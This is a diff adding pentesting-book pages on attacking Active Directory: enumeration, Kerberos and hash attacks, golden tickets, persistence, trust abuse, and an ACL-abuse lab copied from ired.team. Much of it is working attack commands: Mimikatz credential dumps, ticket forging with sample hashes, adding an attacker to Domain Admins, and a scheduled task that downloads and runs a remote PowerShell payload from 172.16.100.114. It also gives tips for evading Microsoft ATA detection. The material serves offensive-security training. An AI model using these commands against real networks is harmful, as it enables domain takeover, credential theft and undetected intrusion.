+* **Enumerate Ldap**:
+  * `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
+  * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)\*\*\*\*
+* **Poison the network**
+  * Gather credentials [**impersonating services with Responder**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
+  * Access host by ****[**abusing the relay attack**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
+  * Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)\*\*\*\*[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)\*\*\*\*
+* **OSINT**: Try to **extract possible usernames** from services \(mainly web\) inside the domain environments and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different AD **username conventions \(**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**\)**. The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ \(3letters of each\), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ \(abc123\). You could also try **statistically most used usernames**: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames) **Read the following Username enumeration section to learn how to find if a username is valid or not.**
+
+### User enumeration
+
+When an **invalid username is requested** the server will respond using the **Kerberos error** code _**KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN**_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response **or** the error _**KRB5KDC\_ERR\_PREAUTH\_REQUIRED**_, indicating that the user is required to perform pre-authentication.
+
+```text
+nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
+Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
+msf> use auxiliary/gather/kerberos_enumusers
+./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
+crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
+enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'
+```
+
+You could also use the **impacket script of ASREPRoast** to enumerate valid usernames.
+
+### Knowing one or several usernames
+
+Ok, so you know you have already a valid username but no passwords...Then try:
+
+* \*\*\*\*[**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _**DONT\_REQ\_PREAUTH**_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
+* \*\*\*\*[**Password Spraying**](password-spraying.md): Let's **try** the most **common passwords** with each of the discovered users, maybe some user is using a bad password \(keep in mind the password policy\)
+* A final option if the accounts cannot be locked is the ****[**traditional bruteforce**](password-spraying.md) **\(be careful\)**.
+
+## Enumerating Active Directory \(Some creds/Session\)
+
+For this phase you need to have **compromised the credentials or a session of a valid domain account.**
+
+### Enumeration
+
+If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.  
+Regarding [**ASREPRoast** ](asreproast.md)you can now find every possible vulnerable user, and regarding ****[**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account \(if you know it\). It's very easy to obtain all the domain usernames from Windows \(`net user /domain` ,`Get-DomainUser`or `wmic useraccount get name,sid`\). In **linux** you can use:  `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`
+
+Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
+
+* You could use some[ Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**.
+* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** \(depending on the collection methods you use\), but **if you don't care** about that, you should totally give it a **try**.
+* If you are using **Linux**, you could also [enumerate the domain using **pywerview**](https://github.com/the-useless-one/pywerview)**.**
+* You could also **try** [**https://github.com/tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)\*\*\*\*
+
+**Even if this Enumeration section looks small this is the most important part of all. Access the links \(mainly the one of cmd, powershell, powerview and BloodHound\), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.** 
+
+### **Kerberoast**
+
+The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets** are **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.  
+You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.  
+**Find more information about this attack** [**in the Kerberoast page**](kerberoast.md)**.**
+
+### Local Privilege Escalation
+
+If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally**. This is because only with admin privileges you will be able to **dump hashes of other users** in memory \(LSASS\) and locally \(SAM\).  
+There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a ****[**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to try ****[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
+
+### Win-RM
+
+Once you have obtained some credentials you could check if you have **access** to any **machine** using the **win-rm service**.  
+[**More information about how to use and abuse win-rm here.**](../../pentesting/5985-5986-pentesting-winrm.md)\*\*\*\*
+
+## Privesc on Active Directory \(Some "privileged" Creds/Session\)
+
+**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
+
+### Hash extraction
+
+Hopefully you have managed to **compromise some local admin** account using [ASREPROast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md), [EvilSSDP](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [Enumerating](./#enumerating-active-directory)... or [escalating privileges locally](../windows-local-privilege-escalation/).  
+Then, its time to dump all the hashes in memory and locally.   
+[**Read this page about different ways to obtain the hashes.**](../stealing-credentials/)\*\*\*\*
+
+### **Pass the Hash**
+
+**Once you have the hash of a user**, you can use it to **impersonate** it.  
+You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.  
+****[**More information about this attack and about how does NTLM works here.**](../ntlm/#pass-the-hash)\*\*\*\*
+
+### **Over Pass the Hash/Pass the Key**
+
+This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.  
+[**More information about Over Pass the Hash/Pass the Key here.**](over-pass-the-hash-pass-the-key.md)\*\*\*\*
+
+### **Pass the Ticket**
+
+This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.  
+****[**More information about Pass the Ticket here.**](pass-the-ticket.md)\*\*\*\*
+
+### **MSSQL Trusted Links**
+
+If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host \(if running as SA\).   
+Also, if a MSSQL instance is trusted \(database link\) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.  
+**The links between databases work even across forest trusts.**  
+[**More information about this technique here.**](mssql-trusted-links.md)\*\*\*\*
+
+### **Unconstrained Delegation**
+
+**If you find any Computer object with the attribute** [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300%28v=vs.85%29.aspx) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.   
+So, if a **Domain Admin logins onto the computer**, you will be able to dump his TGT and impersonate him using [Pass the Ticket](pass-the-ticket.md).  
+Thanks to constrained delegation you could even **automatically compromise  a Print Server** \(hopefully it will be a DC\).  
+[**More information about this technique here.**](unconstrained-delegation.md)\*\*\*\*
+
+### **Constrained Delegation**
+
+If a user or computer is allowed for "Constrained Delegation" it will be able to **impersonate any user to access some services in a computer**.  
+Then, if you **compromise the hash** of this user/computer you will be able to **impersonate any user** \(even domain admins\) to access some services.  
+[**More information about this attacks and some constrains here.**](constrained-delegation.md)\*\*\*\*
+
+### **ACLs Abuse**
+
+The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.  
+[**More information about interesting privileges here.**](acl-persistence-abuse.md)\*\*\*\*
+
+### Printer Spooler service abuse
+
+If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.  
+[**More information about how to find a abuse Spooler services here.**](printers-spooler-service-abuse.md)\*\*\*\*
+
+## **Dumping Domain Credentials**
+
+Once you get **Domain Admin** privileges, you can **dump** all the **domain database**.
+
+```bash
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
+```
+
+**More information about** [**DCSync attack can be found here**](dcsync.md)**.  
+More information about**[ **how to steal the ntdis.dir \(Domain database\) can be found here**](../stealing-credentials/)**.**
+
+## **Persistence**
+
+**Some of the techniques discussed before can be used for persistence. For example you could make a user vulnerable to** [**ASREPRoast** ](asreproast.md)**or to** [**Kerberoast**](kerberoast.md)**.**
+
+### **Golden Ticket**
+
+A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** \(or machine\) in the domain ad the impersonated user.
+
+\*\*\*\*[**More information about Golden Ticket here.**](golden-ticket.md)\*\*\*\*
+
+### **Silver Ticket**
+
+The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** \(like the **PC account hash**\). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user** \(like privileged access to a computer\).  
+[**More information about Silver Ticket here.**](silver-ticket.md)\*\*\*\*
+
+### **AdminSDHolder Group**
+
+The Access Control List \(ACL\) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.  
+By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group \(in an hour\).  
+And if someone tries to delete this user from the Domain Admins \(for example\) in an hour or less, the user will be back in the group.  
+****[**More information about AdminSDHolder Group here.**](privileged-accounts-and-token-privileges.md#adminsdholder-group)\*\*\*\*
+
+### **DSRM Credentials**
+
+There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.  
+****[**More information about DSRM Credentials here.**](dsrm-credentials.md)
+
+### **ACL Persistence**
+
+You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.  
+[**More information about interesting privileges here.**](acl-persistence-abuse.md)\*\*\*\*
+
+### **Security Descriptors**
+
+The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.  
+****[**More information about Security Descriptors here.**](security-descriptors.md)\*\*\*\*
+
+### Skeleton Key
+
+**Modify LSASS** in memory to create a **master password** that will work for any account in the domain.  
+[**More information about Skeleton Key here.**](skeleton-key.md)\*\*\*\*
+
+### **Custom SSP**
+
+[Learn what is a SSP \(Security Support Provider\) here.](../credentials.md#security-support-provider-interface-sspi)  
+You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.  
+****[**More information about Custom SSP here.**](custom-ssp.md)
+
+### **DCShadow**
+
+It registers a **new Domain Controller** in the AD and uses it to **push attributes** \(SIDHistory, SPNs...\) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.  
+Note that if you use wrong data, pretty ugly logs will appear.  
+****[**More information about DCShadow here.**](dcshadow.md)
+
+## **Forest Privilege Escalation -** Domain Trusts
+
+Microsoft considers that the **domain isn't a Security Boundary**, the **Forest is the security Boundary**. This means that **if you compromise a domain inside a Forest you are going to be able to compromise the entire Forest**.
+
+### Basic Information
+
+At a high level, a [**domain trust**](http://technet.microsoft.com/en-us/library/cc759554%28v=ws.10%29.aspx) establishes the ability for **users in one domain to authenticate** to resources or act as a [security principal](https://technet.microsoft.com/en-us/library/cc780957%28v=ws.10%29.aspx) **in another domain**.
+
+Essentially, all a trust does is **linking up the authentication systems of two domains** and allowing authentication traffic to flow between them through a system of referrals.   
+When **2 domains trust each other they exchange keys**, these **keys** are going to be **saved** in the **DCs** of **each domains** \(**1 key per trust direction**\) and the keys will be the base of the trust.
+
+When a **user** tries to **access** a **service** on the **trusting domain** it will request an **inter-realm TGT** to the DC of its domain. The DC wills serve the client this **TGT** which would be **encrypted/signed** with the **inter-realm** **key** \(the key both domains **exchanged**\). Then, the **client** will **access** the **DC of the other domain** and will **request** a **TGS** for the service using the **inter-realm TGT**. The **DC** of the trusting domain will **check** the **key** used, if it's ok, it will **trust everything in that ticket** and will serve the TGS to the client. 
+
+![](../../.gitbook/assets/image%20%2865%29.png)
+
+### Different trusts
+
+It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways options, both domains will trust each other, but in the **1 way** trust relation one of the domains will be the **trusted** and the other the **trusting** domain. In the last case, **you will only be able to access resources inside the trusting domain from the trusted one**.
+
+A trust relationship can also be **transitive** \(A trust B, B trust C, then A trust C\) or **non-transitive**.
+
+**Different trusting relationships:**
+
+* **Parent/Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
+* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
+* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178%28v=ws.10%29.aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
+* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178%28v=ws.10%29.aspx), they’re created when you when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352%28v=ws.10%29.aspx) while allowing the tree to have a separate domain name \(instead of child.parent.com\).
+* **Forest** – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.
+* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
+
+### Attack Path
+
+1. **Enumerate** the trusting relationships
+2. Check if any **security principal** \(user/group/computer\) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** \(the trust was created for this probably\).
+   1. kerberoast in this case could be another option.
+3. **Compromise** the **accounts** which can **pivot** through domains. 
+
+There are three **main** ways that security principals \(users/groups/computer\) from one domain can have access into resources in another foreign/trusting domain:
+
+* They can be added to **local groups** on individual machines, i.e. the local “Administrators” group on a server.
+* They can be added to **groups in the foreign domain**. There are some caveats depending on trust type and group scope, described shortly.
+* They can be added as principals in an **access control list**, most interesting for us as principals in **ACEs** in a **DACL**. For more background on ACLs/DACLs/ACEs, check out the “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” whitepaper.
+
+### Child-to-Parent forest privilege escalation
+
+Also, notice that there are **2 trusted keys**, one for _Child --&gt; Parent_  and another one for P_arent --&gt; Child_.
+
+```bash
+Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
+```
+
+```bash
+Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
+/domain:<Current domain>
+/sid:<SID of current domain>
+/sids:<SID of the Enterprise Admins group of the parent domain>
+/rc4:<Trusted key>
+/user:Administrator
+/service:<target service>
+/target:<Other domain>
+/ticket:C:\path\save\ticket.kirbi
+```
+
+For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in  S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
+
+[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
+
+```bash
+.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local 
+ .\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
+ ls \\mcorp-dc.moneycorp.local\c$
+```
+
+Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
+
+```bash
+Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
+Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
+gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
+schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
+schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
+```
+
+### External Forest Domain Privilege escalation
+
+In this case you can **sign with** the **trusted** key a **TGT impersonating** the **Administrator** user of the current domain. In this case you **won't always get Domain Admins privileges in the external domain**, but **only** the privileges the Administrator user of your current domain **was given** in the external domain.
+
+```bash
+Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
+```
+
+### Domain trust abuse mitigation
+
+**SID Filtering:**
+
+* Avoid attacks which abuse SID history attribute across forest trust.
+* Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secured by default \(MS considers forest and not the domain to be a security boundary\).
+* But, since SID filtering has potential to break applications and user access, it is often disabled.
+* Selective Authentication
+  * In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.
+
+\*\*\*\*[**More information about domain trusts in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)\*\*\*\*
+
+## Some General Defenses
+
+\*\*\*\*[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)  
+**Please, find some migrations against each technique in the description of the technique.**
+
+* Not allow Domain Admins to login on any other hosts apart from Domain Controllers
+* Never run a service with DA privileges
+* If you need domain admin privileges, limit the time: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
+
+### Deception
+
+* Password does not expire
+* Trusted for Delegation
+* Users with SPN
+* Password in description
+* Users who are members of high privilege groups
+* Users with ACL rights over other users, groups or containers
+* Computer objects
+* ...
+* [https://github.com/samratashok/Deploy-Deception](https://github.com/samratashok/Deploy-Deception)
+  * `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
+
+## How to identify deception
+
+**For user objects:**
+
+* ObjectSID \(different from the domain\)
+* lastLogon, lastlogontimestamp 
+* Logoncount \(very low number is suspicious\)
+* whenCreated
+* Badpwdcount \(very low number is suspicious\)
+
+**General:**
+
+* Some solutions fill with information in all the possible attributes. For example, compare the attributes of a computer object with the attribute of a 100% real computer object like DC. Or users against the RID 500 \(default admin\).
+* Check if something is too good to be true
+* [https://github.com/JavelinNetworks/HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)
+
+### Bypassing Microsoft ATA detection
+
+#### User enumeration
+
+ATA only complains when you try to enumerate sessions in the DC, so if you don't look for sessions in the DC but in the rest of the hosts, you probably won't get detected.
+
+#### Tickets impersonation creation \(Over pass the hash, golden ticket...\)
+
+Always create the tickets using the **aes** keys also because what ATA identifies as malicious is the degradation to NTLM.
+
+#### DCSync
+
+If you don't execute this from a Domain Controller, ATA is going to catch you, sorry.
+
+## More Tools
+
+* [Powershell script to do domain auditing automation](https://github.com/phillips321/adaudit)
+* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
+* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
+
+
+
+![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%282%29.png)
+
+​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/acl-persistence-abuse.md b/windows/active-directory-methodology/acl-persistence-abuse.md
new file mode 100644
index 00000000..b9745dea
--- /dev/null
+++ b/windows/active-directory-methodology/acl-persistence-abuse.md
@@ -0,0 +1,430 @@
+# Abusing Active Directory ACLs/ACEs
+
+**This information was copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
+
+## Context
+
+This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists \(DACLs\) and Acccess Control Entries \(ACEs\) that make up DACLs.
+
+Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects \(i.e change account name, reset password, etc\). 
+
+An example of ACEs for the "Domain Admins" securable object can be seen here:
+
+![](../../.gitbook/assets/1%20%281%29.png)
+
+Some of the Active Directory object permissions and types that we as attackers are interested in:
+
+* **GenericAll** - full rights to the object \(add users to a group or reset user's password\)
+* **GenericWrite** - update object's attributes \(i.e logon script\)
+* **WriteOwner** - change object owner to attacker controlled user take over the object
+* **WriteDACL** - modify object's ACEs and give attacker full control right over the object
+* **AllExtendedRights** - ability to add user to a group or reset password
+* **ForceChangePassword** - ability to change user's password
+* **Self \(Self-Membership\)** - ability to add yourself to a group
+
+In this lab, we are going to explore and try to exploit most of the above ACEs.
+
+## GenericAll on User
+
+Using powerview, let's check if our attacking user `spotless` has `GenericAll rights` on the AD object for the user `delegate`:
+
+```csharp
+Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}  
+```
+
+We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account:
+
+![](../../.gitbook/assets/2.png)
+
+We can reset user's `delegate` password without knowing the current password:
+
+![](../../.gitbook/assets/3.png)
+
+## GenericAll on Group
+
+Let's see if `Domain admins` group has any weak permissions. First of, let's get its `distinguishedName`:
+
+```csharp
+Get-NetGroup "domain admins" -FullData
+```
+
+![](../../.gitbook/assets/4.png)
+
+```csharp
+ Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
+```
+
+We can see that our attacking user `spotless` has `GenericAll` rights once again:
+
+![](../../.gitbook/assets/5.png)
+
+Effectively, this allows us to add ourselves \(the user `spotless`\) to the `Domain Admin` group:
+
+```csharp
+net group "domain admins" spotless /add /domain
+```
+
+![](../../.gitbook/assets/6.gif)
+
+Same could be achieved with Active Directory or PowerSploit module:
+
+```csharp
+# with active directory module
+Add-ADGroupMember -Identity "domain admins" -Members spotless
+
+# with Powersploit
+Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
+```
+
+## GenericAll / GenericWrite / Write on Computer
+
+If you have these privileges on a Computer object, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](resource-based-constrained-delegation.md) off.
+
+## WriteProperty on Group
+
+If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group:
+
+![](../../.gitbook/assets/7.png)
+
+We can again add ourselves to the `Domain Admins` group and escalate privileges:
+
+```csharp
+net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
+```
+
+![](../../.gitbook/assets/8.png)
+
+## Self \(Self-Membership\) on Group
+
+Another privilege that enables the attacker adding themselves to a group:
+
+![](../../.gitbook/assets/9.png)
+
+```csharp
+net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
+```
+
+![](../../.gitbook/assets/10.png)
+
+## WriteProperty \(Self-Membership\)
+
+One more privilege that enables the attacker adding themselves to a group:
+
+```csharp
+Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+![](../../.gitbook/assets/11.png)
+
+```csharp
+net group "domain admins" spotless /add /domain
+```
+
+![](../../.gitbook/assets/12.png)
+
+## **ForceChangePassword**
+
+If we have `ExtendedRight` on `User-Force-Change-Password` object type, we can reset the user's password without knowing their current password:
+
+```csharp
+Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+![](../../.gitbook/assets/13.png)
+
+Doing the same with powerview:
+
+```csharp
+Set-DomainUserPassword -Identity delegate -Verbose
+```
+
+![](../../.gitbook/assets/14.png)
+
+Another method that does not require fiddling with password-secure-string conversion:
+
+```csharp
+$c = Get-Credential
+Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
+```
+
+![](../../.gitbook/assets/15.png)
+
+...or a one liner if no interactive session is not available:
+
+```csharp
+Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
+```
+
+![](../../.gitbook/assets/16.png)
+
+## WriteOwner on Group
+
+Note how before the attack the owner of `Domain Admins` is `Domain Admins`:
+
+![](../../.gitbook/assets/17.png)
+
+After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
+
+```csharp
+Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+![](../../.gitbook/assets/18.png)
+
+...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
+
+```csharp
+Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
+```
+
+![](../../.gitbook/assets/19.png)
+
+## GenericWrite on User
+
+```csharp
+Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+![](../../.gitbook/assets/20.png)
+
+`WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
+
+```csharp
+Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
+```
+
+Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
+
+![](../../.gitbook/assets/21.png)
+
+## WriteDACL + WriteOwner
+
+If you are the owner of a group, like I'm the owner of a `Test` AD group:
+
+![](../../.gitbook/assets/22.png)
+
+Which you can of course do through powershell:
+
+```csharp
+([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
+```
+
+![](../../.gitbook/assets/23.png)
+
+And you have a `WriteDACL` on that AD object:
+
+![](../../.gitbook/assets/24.png)
+
+...you can give yourself [`GenericAll`]() privileges with a sprinkle of ADSI sorcery:
+
+```csharp
+$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
+$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
+$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow"
+$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
+$ADSI.psbase.commitchanges()
+```
+
+Which means you now fully control the AD object:
+
+![](../../.gitbook/assets/25.png)
+
+This effectively means that you can now add new users to the group.
+
